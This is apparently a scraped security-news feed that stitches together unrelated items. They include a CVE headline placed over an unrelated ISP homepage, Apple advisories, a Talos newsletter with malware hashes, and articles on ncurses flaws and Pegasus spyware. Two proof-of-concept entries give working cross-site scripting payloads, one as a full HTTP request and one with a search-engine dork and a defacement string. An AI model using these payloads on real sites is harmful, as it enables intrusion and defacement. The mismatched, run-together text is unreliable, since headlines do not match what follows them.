An information leak in YKC Tokushima_awayokocho Line v13.6.1 allows attackers to obtain the channel access token and send crafted messages.

*   Home
*   Services
    *   Home Internet
    *   Voice Services
    *   Home Security
*   Our Story
    *   Our Mission
    *   Community Involvement
    *   Scholarship & Grants
*   Careers
*   Support
    *   Understanding Your Bill
    *   Tech Glossary
    *   Wi-Fi 101 Videos
*   Blog
*   Contact Us

Menu

*   Home
*   Services
    *   Home Internet
    *   Voice Services
    *   Home Security
*   Our Story
    *   Our Mission
    *   Community Involvement
    *   Scholarship & Grants
*   Careers
*   Support
    *   Understanding Your Bill
    *   Tech Glossary
    *   Wi-Fi 101 Videos
*   Blog
*   Contact Us

Menu

**Ready to Get Connected?**

Find out which of our services are available in your area.

**A Proud Rural Service Provider**

**DRIVEN TO BE THE BEST**

YK Communications strives to provide superior communications technologies to the homes and businesses in our service areas.

We deliver an exceptional level of local customer care with personal attention, prompt responses, and strong working relationships.

Our owners, management team, and employees all live in, work in, and enthusiastically support the communities we serve.

**A Customizable Experience**

With Whole-Home Wi-Fi and a CommandIQ app, you have complete control over things like parental controls and cybersecurity!

**Speeds Up To 1 GIG**

We’ve got fiber, yes we do. So whether you are busy gaming, streaming, downloading, or re-spawning – you can leave the lag behind.

**24/7 Technical Support**

YK Communications makes it a priority to keep you connected. Technical support is available 24 hours a day, 7 days a week.

**BUILD YOUR CUSTOM EXPERIENCE**

Our experience-enhancing add-ons allow you to build the service that works best for you and your household. Contact a specialist today for a free service consultation by calling 

(361) 771-3334.

**Click To Learn More About:**

**WAYS TO SAVE**

**on Services you Need**

YK Communications works to offer exceptional services without cutting corners – but sometimes we can help you cut down on extra costs through promotions. Check out the options below for details.

**Your Neighbors Are**

**OUR HAPPY CUSTOMERS**

“Great customer service, and very helpful with everything! We use them for all our security, phone, internet, website, and more! So glad we can shop local! YKC has always supported our local community which gives you more reasons to shop local! When is the last time the mall or Apple has supported the local 4H, Boy/Girl Scouts, the school, Volunteer Fire Department, and more? Thank you Ganado Telephone and YKC for all you do for our personal and public needs.”

**Seth Brezina**

**Read What’s Happening On**

**THE YK BLOG**

**Troubleshooting Your Wi-Fi: What Else Causes Internet Connectivity Issues?**

As a YK Communications internet service customer, you rely on your Wi-Fi connection for everything from streaming movies and playing games to online shopping and staying connected with family and friends. So, when something goes wrong, it can be frustrating and even stressful. However, before you call our 24/7 support team, there are a few things you can try to

Read More

**Beware of Summer Security Scams: Stay Protected with YK Communications**

With the onset of summer and the increasing temperatures, many of us look forward to spending more time outdoors. However, this delightful season also brings along a less pleasant annual tradition – the influx of door-to-door salesmen, often peddling home security systems. While some represent legitimate companies, others exploit the summer spike in sales activity to blend in and prey

Read More

**We're Social!**

Like and follow us online @ykcomms

Next To You. Ahead Of Technology. We’re a local provider of residential and business-class InternetA global wide area network (WAN), also described as a networ… More, Voice, Video and Security services in Texas.

**Quick Links**

**Give Us A Call**

**to get connected or upgrade!**

**Visit Us**

All rights reserved. Copyrighted 2023 by YK Communications.

CVE-2023-39043: Home - YK Communications

Apple Security Advisory 2023-09-11-3 - macOS Big Sur 11.7.10 addresses buffer overflow and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-09-11-3 macOS Big Sur 11.7.10

macOS Big Sur 11.7.10 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213915.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
actively exploited.  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2023-41064: The Citizen Lab at The University of Torontoʼs Munk  
School

macOS Big Sur 11.7.10 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmT/m3MACgkQX+5d1TXa  
IvqNSg//bbzgVN2E8yAjEnjXK08rQlR7TmCxvDCa9s2GI3hPYb881pMDz2kG4ntu  
C8MaKgYwQ8f6DKowxL2bJAXz9p48tzfHEcxVVCW3vwel0MrstLQRllrv4GrRrU2T  
/kkOWs4WZPQYMuvf+j08+KlGOWwPdhxNBlkzoZKe1Sq0DKFOBhdwnBfUsQgREMK+  
zFz7iVYHKCgAs8hQwOA7mmxa7W42PO5XuBh2d4bxsjiV+63Z4vIhy3uiXrqGDolT  
pOLsOXpRaLxDeVTi7/AKBJcR+ScC/wTinCBaFuELqQsXeYVKJeLl901MYa54VZtf  
6x+7c/QOKf8LUQR58VH9uB1cRGaC4rI0GfGBMZAR3C1xhM0TRzHuH6HOsBK2ZQva  
OprPGZ8aNb1XhuuZeYYxNnXOtmto8V8ZynBzjoPv5P3BeaBgRbpOnlIsamSTQUeb  
BSLnKQ6MbDbrGBQHcqKhdYyL65EzXGfoYgLbKG+FdzoaTdJ8EO+FXum6smPcHEvm  
uzHkCQvYPZ6ZpeGQ3OPrD0mqTrqdI5JwdM1Qj3ks5srGHH8UYK1k1TQx5kK/5MX1  
1ASkIhexyGtDS3DNVWOaDniRXA6bMNrJCNQC7PU5O1Py0kR1gITB9WAP+LOQ4PBF  
Of9Y2FxFxHMYJ40gHwa5e/mo4Sf5fvnr9WUU9/34VC5f+tTI47M=  
=bfbZ  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-11-3

Apple Security Advisory 2023-09-11-2 - macOS Monterey 12.6.9 addresses buffer overflow and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-09-11-2 macOS Monterey 12.6.9

macOS Monterey 12.6.9 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213914.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

ImageIO  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
actively exploited.  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2023-41064: The Citizen Lab at The University of Torontoʼs Munk  
School

macOS Monterey 12.6.9 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmT/m3IACgkQX+5d1TXa  
IvrzPg//a+Al1VjRmASSN1lWptcH3EN4AcviKdzPAcl3Wtlh/28UFzIuMkgyH7B/  
e0VUEgqo+4RqyYVfmWTZJBQ9J0otX3M+wG9XRVt3VlgwStqQ9+sjK1nRIMKq3YO6  
KMVM9TggVAqEQOOTvdPhsb439RoP2q8kAiQnxw0r/CqzWkPnLvDTdLGWW5WO4G2Q  
tFv7z2nV4aPsmZWDwsfc4S8UyrAP+57iBLpegwD6kLaLiRFOm4ZS/bPmWYck0HDK  
qojdx6gJ3fYVCoMexiJuBLpJWdCA582f8SfsgYj1/pIwmTC2Vu5HZz3FxF6ULAuY  
rbmcZO2zA9w30XgjPDtWQ3l00mVi8Pnod4gDD0bN2aYuDtTXWQ7U/zmkT65kDLPO  
uQCZmBAeRLaaUnBlmGRpHBe7zqLlUTU+AcjzRwcXs7WnEuZ59WVCkMlQIELmAx2m  
/2jEcMMBe9GNnxEcSa7N0HBbuPHrakC5JA4u63SYeb2NHe9i5PPlwQvRHJJ+Atps  
LpsqgdSNk0LmLgldzglIVdhoRBo6F3i1BuIeof0STBLgl3AM1jJJWeL0wPv5RV95  
eIN+Uvs7ni1OUZUq0Io7vAg1alyZAv6TZEz8venYA0J+2WxFVu/jOaOxwGJUyzQf  
7fblA7wBfxZ+TdZKzaU6OUCoJP/g/gDWzrBG+0EJGH9dcxJP8no=  
=I1tR  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-11-2

Apple Security Advisory 2023-09-11-1 - iOS 15.7.9 and iPadOS 15.7.9 addresses buffer overflow and code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-09-11-1 iOS 15.7.9 and iPadOS 15.7.9iOS 15.7.9 and iPadOS 15.7.9 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT213913.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.ImageIOAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE(1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch(7th generation)Impact: Processing a maliciously crafted image may lead to arbitrarycode execution. Apple is aware of a report that this issue may have beenactively exploited.Description: A buffer overflow issue was addressed with improved memoryhandling.CVE-2023-41064: The Citizen Lab at The University of Torontoʼs MunkSchoolThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 15.7.9 and iPadOS 15.7.9".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmT/m3IACgkQX+5d1TXaIvq6Ww//WB9pTBOCCs5nm4b199CRT+zde3vODQd70Jk6hux40O+XnoObqqpB3ZxDeiklegUOLEbGhgKqHyLMWxDUXCx0FaQMx2EzzwfRkYGSRnreDnFLd1V50mC4kWukw711Y6ZEdwrV9DhK0/M/3lzbhOMt4lLrPYeb4i2LJ/zFsqVTW8lrLqITkA3RapnsMtMH/zXzL5PYmNMP8Vbjudb+9T0LQ5+WEh4JvGheVnxe/X7Ijqv+v5MUUbp6U31jxvTrhcKKsOqSgJrBTxoE+AICD7uEFNpcdxXo+yFOfFP7F//iXVWGYGpjb/xmmxiWZGFKhQkuM1wk9tCLZEhQYVRplKAtxTTEzoXfdCLWbHn6drxX2oFA+BThwnInUO2zAGcy2MOoPK9F+JZPheMGdE9ZJa/B8s/Vtim1KL6nQukVXpqtC77RQHo2c5IeDQBSnzhdxLxAL2qqENLt/rrY3tQvvPt5aithjJ4y4wwSUeeavcEqyHbum2XavwmK7YpHiGRdb76wQFd7gISPlgEuDW9mK8bsrNOUk9UDu6EgXrIGgjpvT/YSd779UgxcTUusBfWigHBgtvXF8ju5QrECxNSSRz/Byh+j7Pbf6iVMrvU9TyIJrhIhtHNWMx1fwQVp+eIp5LLjSc1OM0swUL1qtsgXlxcVLkMc0HmFd1BVQRi1g5Pdyp0==+8rR-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-11-1

The Dropbox Folder Share plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 1.9.7 via the 'link' parameter. This can allow unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVE-2023-3025: Principal.php in dropbox-folder-share/trunk/HynoTech/DropboxFolderShare – WordPress Plugin Repository

With the popularity of pay-for-shoutout services like Cameo, it’d be fairly easy for someone to develop a convincing enough deepfake of a player and try to steal someone’s money by saying they could prank their fantasy football league for $50.

Thursday, September 14, 2023 14:09

Welcome to this week’s edition of the Threat Source newsletter.

I’m at the point in the calendar year where I’m a sponge for NFL content. I couldn’t be happier to escape from my six-month American football-free slumber and am ready to watch games three days a week and listen to NFL podcasts or read power rankings the other four.

So of course, I wasn’t going to miss this feature in Dark Reading from the NFL’s chief information security officer, which just happens to include several shoutouts to Talos and Cisco. Talos is a valuable security partner with the NFL, helping secure their major events like the NFL Draft and Super Bowl, the most-watched entertainment event in the U.S. every year.

One of the things that Tomás Maldonado said in the Dark Reading interview really stood out to me — that he’s worried about deepfakes of NFL players being used in scams. Deepfakes have been making the rounds for years in scams of celebrities and politicians seeming to ask for various things (often money), and Maldonado said he’s worried that attackers could start using the likenesses of popular NFL players for scams and spam.

I actually hadn’t realized that deepfakes had already been around in the NFL sphere for a while, though.

In an ESPN “30 for 30” documentary in 2021, the creators used deepfake, AI voices for former Raiders owner Al Davis and former commissioner Pete Rozelle, who both died many years before the creation of this documentary. Public reception was mixed, at best.

The league’s Dallas Cowboys are also jumping on the AI train and created a hologram, AI-powered version of team owner Jerry Jones. Fans can pay $55 to take a tour of the Cowboys’ AT&T Stadium and ask the AI version of Jones questions (as a Browns fan, I mainly would just like to thank him for only asking for a fifth-round pick in exchange for receiver Amari Cooper).

Bad actors have shown they will literally use any and all forms of deepfakes to try and trick users. So it’s not hard to see where Maldonado is coming from with his concerns.

With the popularity of pay-for-shoutout services like Cameo, it’d be fairly easy for someone to develop a convincing enough deepfake of a player and try to steal someone’s money by saying they could prank their fantasy football league for $50. This just isn’t a particular attack vector I had considered before — I always assumed deepfakes were reserved for political leaders or some of the highest-profile people in the world.

And while I couldn’t find any current examples of where this is actively happening in the wild, it’s not a crazy jump to think that if ESPN can create a convincing AI version of Al Davis that someone else can’t make an AI voice that sounds just like Aaron Rodgers asking for money or a fake Russell Wilson pushing season ticket “deals.”

**The one big thing**

Microsoft disclosed two zero-day vulnerabilities as part of this monthly security update on Tuesday, one of which already has proof-of-concept code floating around in the wild. There are five other critical vulnerabilities included in September’s Patch Tuesday, which is relatively low for a traditional Microsoft security release, and 56 vulnerabilities the company considers “important.”

**Why do I care?**

One of the vulnerabilities adversaries are already exploiting in the wild is CVE-2023-36802, an elevation of privilege vulnerability in Microsoft Streaming Service, a corporate video sharing platform integrated into SharePoint and Office 365. An adversary who successfully exploits this vulnerability can gain SYSTEM privileges. Additionally, CVE-2023-36761 has already been exploited in the wild and proof of concept code is publicly available. Although it is not clear how exactly an attacker could exploit this vulnerability in Microsoft Word, Microsoft states that the Preview Pane is also a potential attack vector in this case. If successful, an adversary could view NTLM hashes. Microsoft’s warnings about these vulnerabilities indicate attackers are already exploiting these issues in the wild, even prior to Tuesday’s patch, so all users should be sure to patch these ASAP.

**So now what?**

Microsoft’s security update guide has all the patches users need to install, which everyone should do now if they haven’t already. Talos’ Patch Tuesday blog also outlines several Snort rules we released to detect the exploitation of some of these vulnerabilities.

**Top security headlines of the week**

**Apple released a series of security updates over the past week that users of all the companies’ mobile devices are encouraged to install as soon as possible.** A security update on Sept. 7 warned that users needed to update to iOS 16.6.1 or iPadOS 16.6.1 right away to fix security updates that attackers were actively exploiting in the wild. In some cases, these exploits led to the installation of spyware on targeted devices. Apple said in an advisory that, “Processing a maliciously crafted image may lead to arbitrary code execution.” The company followed that up with another security update on Monday for older models of iPhones, iPads, Macs and other Apple devices that "provides important security fixes,” likely the same vulnerabilities. Apple was scheduled to announce its newest iPhone and Apple Watch at an event Wednesday. (USA Today, CNET)

**The U.S. and U.K. have sanctioned more alleged members of the Trickbot cybercrime ring.** Law enforcement officials in both countries announced sanctions against 11 individuals they claim are “involved in management and procurement for the Trickbot group.” Trickbot is known for targeting large businesses and organizations with ransomware and has alleged ties to the Russian government. Seven of the people listed are also charged with working with the Conti ransomware group, which broke up at the end of 2022. These people are alleged "administrators, managers, developers, and coders” for Conti. The U.K.’s National Crime Agency reported that Trickbot attacks have generated an estimated $180 million from victims, $33.6 million of that coming from victims in the U.K. The group’s list of reported victims includes hospitals, schools and government agencies across the globe. (TechCrunch, Dark Reading)

**Security researchers are concerned that adversaries are starting to crack stolen passkeys taken during a data breach at LastPass.** More than 150 people recently affected by cryptocurrency wallet thefts were LastPass users, leading to the equivalent of $35 million in virtual currency being stolen. Many cryptocurrency consumers use security phrases to protect their wallets, and then store that phase in an encrypted folder inside a password manager like LastPass. If an attacker were able to learn that phrase, they could essentially access all the victims’ cryptocurrency holdings tied to that key. LastPass has yet to comment on the researchers’ findings because they said an active law enforcement investigation is still ongoing into the 2022 breach. (Krebs on Security, The Verge)

**Can’t get enough Talos?**

*   Talos Takes Ep. #154: SapphireStealer hits the open internet
*   Researcher Spotlight: You can try to hide your firmware from Kelly Patterson, but she’ll find it (and break it)
*   Eight vulnerabilities in Open Automation Software Platform could lead to information disclosure, improper authentication
*   Cyber-criminals Exploit GPUs in Graphic Design Software

**Upcoming events where you can find Talos**

**LABScon** **(Sept. 20 - 23)**

Scottsdale, Arizona

> _Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit._

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647  
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790  
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::1201

**SHA 256:** d5763a87ec22a583b9dd853e31a9d4cb187d81251ce51099ce3d0f749bbf405a  
**MD5:** 5cedec562076ac629453cc99dd0cdda6  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** W32.Auto:d5763a.in03.Talos

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440  
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e  
**Typical Filename:** iizbpyilb.bat  
**Claimed Product:** N/A  
**Detection Name:** Trojan.Agent.DDOH

**SHA 256:** d5219579eec1819d52761730a72ce7a95ee3f598fcfd9a4b86d1010ea103e827  
**MD5:** bf357485cf123a72a46cc896a5c4b62d  
**Typical Filename:** bf357485cf123a72a46cc896a5c4b62d.virus  
**Claimed Product:** N/A  
**Detection Name:** W32.Auto:d5219579ee.in03.Talos

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

Turns out even the NFL is worried about deepfakes

A set of memory corruption flaws have been discovered in the ncurses (short for new curses) programming library that could be exploited by threat actors to run malicious code on vulnerable Linux and macOS systems.
"Using environment variable poisoning, attackers could chain these vulnerabilities to elevate privileges and run code in the targeted program's context or perform other malicious

Endpoint Security / Vulnerability

A set of memory corruption flaws have been discovered in the ncurses (short for new curses) programming library that could be exploited by threat actors to run malicious code on vulnerable Linux and macOS systems.

"Using environment variable poisoning, attackers could chain these vulnerabilities to elevate privileges and run code in the targeted program's context or perform other malicious actions," Microsoft Threat Intelligence researchers Jonathan Bar Or, Emanuele Cozzi, and Michael Pearse said in a technical report published today.

The vulnerabilities, collectively tracked as **CVE-2023-29491** (CVSS score of 7.8), have been addressed as of April 2023. Microsoft said it also worked with Apple on addressing the macOS-specific issues related to these flaws.

Environment variables are user-defined values that can be used by multiple programs on a system and can affect the manner in which they behave on the system. Manipulating the variables can cause applications to perform otherwise unauthorized operations.

Microsoft's code auditing and fuzzing found that the ncurses library searches for several environment variables, including TERMINFO, which could be poisoned and combined with the identified flaws to achieve privilege escalation. Terminfo is a database that enables programs to use display terminals in a device-independent manner.

UPCOMING WEBINAR

Identity is the New Endpoint: Mastering SaaS Security in the Modern Age

Dive deep into the future of SaaS security with Maor Bin, CEO of Adaptive Shield. Discover why identity is the new endpoint. Secure your spot now.

Supercharge Your Skills

The flaws encompass a stack information leak, a parameterized string type confusion, an off-by-one error, a heap out-of-bounds during terminfo database file parsing, and a denial-of-service with canceled strings.

"The discovered vulnerabilities could have been exploited by attackers to elevate privileges and run code within a targeted program's context," the researchers said. "Nonetheless, gaining control of a program through exploiting memory corruption vulnerabilities requires a multi-stage attack."

"The vulnerabilities may have needed to be chained together for an attacker to elevate privileges, such as exploiting the stack information leak to gain arbitrary read primitives along with exploiting the heap overflow to obtain a write primitive."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Uncovers Flaws in ncurses Library Affecting Linux and macOS Systems

Night Club Booking Software version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Night Club Booking Software-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/09/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/night-club-booking-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the index request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks. Thepayload byymt"><script>alert(1)</script>fs5xr was submitted in the indexparameter. This input was echoed unmodified in the application's response.The attacker can trick the victim into executing arbitrary commands orcode on his machine remotely.STATUS: HIGH-CRITICAL Vulnerability[+]Test Payload:```GET/1694244800_322/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=6254byymt%22%3e%3cscript%3ealert(1)%3c%2fscript%3efs5xr&date=HTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.825432071.1694256178; _gid=GA1.2.1157015144.1694256178;_gat=1; _fbp=fb.1.1694256177815.1029224882X-Requested-With: XMLHttpRequestReferer: https://demo.phpjabbers.com/1694244800_322/preview.php?lid=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116","Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Night-Club-Booking-Software-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/night-club-booking-software-10-xss.html)## Time spent:00:05:00

Night Club Booking Software 1.0 Cross Site Scripting

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

**ImgHosting 1.3 Cross Site Scripting**

Posted Sep 14, 2023

Authored by indoushka

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 8c169afaf39b32fa5c563194367feecff6f19735b337600d64caa7b0f3c6b6a3

Download | Favorite | View

**ImgHosting 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.3 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://www.127.0.0.1/pikhostingcom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,202)
*   Arbitrary (16,255)
*   BBS (2,859)
*   Bypass (1,744)
*   CGI (1,027)
*   Code Execution (7,302)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,535)
*   Encryption (2,371)
*   Exploit (52,098)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (894)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,707)
*   Perl (1,423)
*   PHP (5,153)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,859)
*   Root (3,591)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,897)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,411)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,829)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,999)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,835)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,701)
*   Mac OS X (687)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,853)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,907)
*   UNIX (9,308)
*   UnixWare (186)
*   Windows (6,585)
*   Other

ImgHosting 1.3 Cross Site Scripting

The iPhone belonging to Galina Timchenko, a prominent Russian journalist and critic of the government, was compromised with NSO Group's Pegasus spyware, a new collaborative investigation from Access Now and the Citizen Lab has revealed.
The infiltration is said to have happened on or around February 10, 2023. Timchenko is the executive editor and owner of Meduza, an independent news publication

The iPhone belonging to Galina Timchenko, a prominent Russian journalist and critic of the government, was compromised with NSO Group's Pegasus spyware, a new collaborative investigation from Access Now and the Citizen Lab has revealed.

The infiltration is said to have happened on or around February 10, 2023. Timchenko is the executive editor and owner of Meduza, an independent news publication based in Latvia.

It's currently not clear who deployed the malware on the device. The Washington Post reported that the Russian government is not a client of NSO Group, citing an unnamed person familiar with the company's operations.

"During the infection her device was localized to the GMT+1 timezone, and she reports being in Berlin, Germany," the Citizen Lab said. "The day following the infection she was scheduled to attend a private meeting with other heads of Russian independent media exiled in Europe to discuss how to manage threats and censorship by Putin's regime."

The breach was facilitated by means of a zero-click exploit known as PWNYOURHOME that came to light in April 2023, which combines iOS' HomeKit and iMessage to defeat BlastDoor protections.

The findings come after Timchenko received a threat notification from Apple on June 23, 2023, that state-sponsored attackers may have targeted her iPhone.

The development marks the first documented case where the notorious spyware has been planted on the phone of a Russian target. Pegasus, developed by the Israel-based NSO Group, is a powerful spying tool capable of harvesting sensitive information from infected handsets.

It can be installed on a phone remotely without the victim clicking a link or taking other action, a technique known as a zero-click exploit. While Pegasus is ostensibly licensed to governments and law enforcement agencies to tackle serious crime, it has been repeatedly misused to eavesdrop on members of the civil society.

UPCOMING WEBINAR

Identity is the New Endpoint: Mastering SaaS Security in the Modern Age

Dive deep into the future of SaaS security with Maor Bin, CEO of Adaptive Shield. Discover why identity is the new endpoint. Secure your spot now.

Supercharge Your Skills

The Committee to Protect Journalists (CPJ) said "journalists and their sources are not free and safe if they are spied on, and this attack on Timchenko underscores that governments must implement an immediate moratorium on the development, sale, and use of spyware technologies."

News of the spyware infection also arrives days after Apple rushed to patch two zero-day exploits in iOS that have been weaponized in the wild to distribute Pegasus. Users who are at heightened risk of spyware threats are recommended to enable Lockdown Mode on iPhones to mitigate such threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apple